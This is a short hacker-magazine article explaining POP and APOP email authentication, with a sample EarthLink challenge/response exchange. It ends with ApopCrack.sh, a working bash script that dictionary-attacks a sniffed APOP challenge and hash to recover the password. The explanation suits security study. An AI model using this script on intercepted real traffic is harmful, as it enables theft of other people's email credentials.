APOP Email Protocol - MDS Challenge/Response

by Ovid

If you've ever spent some time with a packet sniffer (like Ethereal, for example) then you've probably seen some Post Office Protocol (POP) packets that were nabbed by the sniffer.  POP is a very insecure protocol when exposed to packet sniffing.

Under standard usage the username and password are sent in the clear.  Usually a POP packet will contain something like this:

1 LOGIN ovid metamorphosis
1 OK User logged in

In this case, ovid is the username and metamorphosis is the password.  Not very secure at all.

In an effort to secure passwords, many ISPs use APOP, which stands for Authenticated POP.

In APOP, the server has stored your password, so there is no need for the password to be sent across the net.  How does the server authenticate you without you sending your password?  Using MD5 challenge/response hashes.

Here's an APOP authentication from EarthLink's mailserver:

+OK NGPopper VEL_6_10 at earthlink.net ready <1895.1226101394@pop-borzoi.atl.sa.earthlink.net>

APOP ovid@earthlink.net f8d01f709fe922fca4628c19f4435c59

+OK ovid has 1 messages (902 octets).

You'll notice that the user doesn't send his password in the clear, but instead sends an encrypted hash.

The server (NGPopper in this example) sends a unique challenge to the client.

In this case the challenge is: <1895.1226101394@pop-borzoi.atl.sa.earthlink.net>

The client then appends the user's password to the challenge, encrypts it with MD5, then sends it to the server.

You can see how the hash is arrived at yourself at a UNIX terminal:

$ echo -e -n "<1895.1226101394@pop-borzoi.atl.sa.earthlink.net>metamorphosis" | md5sum
f8d01f709fe922fca4628c19f4435c59  -

There's the hash of the challenge concatenated with the password: metamorphosis

The server, which already has the user's password, then does the same thing and verifies that the two hashes match.  Pretty neat, but not really that secure, especially if the password is a word found in the dictionary.

In the example above, Ethereal has managed to get both the challenge and the response.  So all we need to do is run a dictionary attack with the challenge added to the front of the text.

Here's a rough bash script called ApopCrack.sh which takes three arguments: a wordlist file, the challenge sent by the server, and the hash sent by the client.

It then runs through all the words, hashing them with the challenge and checking whether it matches the response.  If it gets a hit it echoes the word that matched and exits.

ApopCrack.sh:

#!/bin/bash
# ApopCrack
# $1 is the wordlist file
# $2 is the challenge sent by the server
# $3 is the response sent by the client

# start looping through each line in the worldlist file
exec < $1
while read PassWord
do
  # if the md5 hash matches, echo the word that worked and exit
  if [[ `md5 -qs $2$PassWord` = $3 ]]
  then
    echo $PassWord
    exit
  fi
done 

Code: ApopCrack.sh

Return to $2600 Index